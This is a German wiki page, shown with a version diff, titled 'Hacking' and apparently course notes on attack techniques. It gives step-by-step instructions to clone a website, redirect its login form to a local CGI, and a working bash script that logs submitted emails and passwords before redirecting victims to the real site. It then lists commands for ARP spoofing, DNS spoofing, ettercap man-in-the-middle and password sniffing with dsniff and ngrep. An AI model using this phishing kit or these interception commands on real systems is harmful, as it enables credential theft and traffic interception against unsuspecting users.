Hacking: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 6: | Zeile 6: | ||
wget -l 1 -r http://www.schmeich.de | wget -l 1 -r http://www.schmeich.de | ||
mv http://www.schmeich.de html | mv http://www.schmeich.de html | ||
| − | + | *besser mit browser | |
| + | ==manipulation== | ||
| + | ersetze in index.html | ||
| + | action="https://www.schmeich.de/login.php?login_attempt=1&lwv=110" | ||
| + | durch | ||
| + | action="http://www.schmeich.de/cgi-bin/login.cgi" | ||
| + | ==cgi erstellen== | ||
| + | <pre> | ||
| + | #!/bin/bash | ||
| + | if [ "$REQUEST_METHOD" = "POST" ]; then | ||
| + | if [ "$CONTENT_LENGTH" -gt 0 ]; then | ||
| + | read -n $CONTENT_LENGTH POST_DATA <&0 | ||
| + | fi | ||
| + | fi | ||
| + | MAIL=$(echo $POST_DATA | cut -f 2 -d "&") | ||
| + | PASS=$(echo $POST_DATA | cut -f 3 -d "&") | ||
| + | echo "$MAIL $PASS" >> /tmp/geheim.log | ||
| + | |||
| + | cat<<HERE | ||
| + | |||
| + | <!doctype html> | ||
| + | |||
| + | <html> | ||
| + | <meta http-equiv="refresh" content="0; url=https://www.schmeich.de/" /> | ||
| + | </html> | ||
| + | HERE | ||
| + | </pre> | ||
=ettercap= | =ettercap= | ||
Version vom 13. Oktober 2015, 07:36 Uhr
webseite spiegeln
apt-get install apache2 cd /var/www/ rm -r html
abziehen der Seite
wget -l 1 -r http://www.schmeich.de mv http://www.schmeich.de html
- besser mit browser
manipulation
ersetze in index.html
action="https://www.schmeich.de/login.php?login_attempt=1&lwv=110"
durch
action="http://www.schmeich.de/cgi-bin/login.cgi"
cgi erstellen
#!/bin/bash
if [ "$REQUEST_METHOD" = "POST" ]; then
if [ "$CONTENT_LENGTH" -gt 0 ]; then
read -n $CONTENT_LENGTH POST_DATA <&0
fi
fi
MAIL=$(echo $POST_DATA | cut -f 2 -d "&")
PASS=$(echo $POST_DATA | cut -f 3 -d "&")
echo "$MAIL $PASS" >> /tmp/geheim.log
cat<<HERE
<!doctype html>
<html>
<meta http-equiv="refresh" content="0; url=https://www.schmeich.de/" />
</html>
HERE
ettercap
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
dsniff
Dsniff Tools
Installation unter Ubuntu oder Debian
apt-get install dsniff
Passwörter spionieren mit dsniff - Beispiele
Dsniff
sniffen dsniff -n -i eth1 -s 1500 host 85.10.194.199 -w geheim.dat auswerten dsniff -r geheim.dat ----------------- 02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp) USER wuschel PASS suxa optionen -n = numerische Ausgabe -i eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -w geheim.dat = schreibe in die Datei host 85.10.194.199 = Muster wie bei tcpdump -r geheim.dat = lese aus der Datei
Tcpkill
tcpkill port 80 optionen port 80 = Muster wie bei tcpdump
Arpspoof
arpspoof -t 192.168.254.7 192.168.254.5 optionen -t 192.168.254.7 = Angriffszeil 192.168.254.5 = Mac Adresse wird mit lokaler MacAdresse vertauscht
Webspy
mozilla& webspy 192.168.254.22
Dnsspoof
Der Nameserver muss umgeleitet werden ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/ hosts anlegen 192.168.254.4 www.xinux.de dnsspoofen dnsspoof -f hosts
Ngrep
Installation unter Ubuntu oder Debian
apt-get install ngrep
Passwörter spionieren mit ngrep - Beispiele
sniffen ngrep -d eth1 -s 1500 -l -i 'PASS|USER' port 21
optionen -d eth1 = Schnittstelle -s 1500 = Länge des Mitschnittes pro Paket -l = Ausgabe wird zeilenweise gepuffert -i = Ignoriere Gross und Kleinschreibung 'PASS|USER' = Suchmuster in den Daten PASS oder USER port 21 = Muster wie bei tcpdump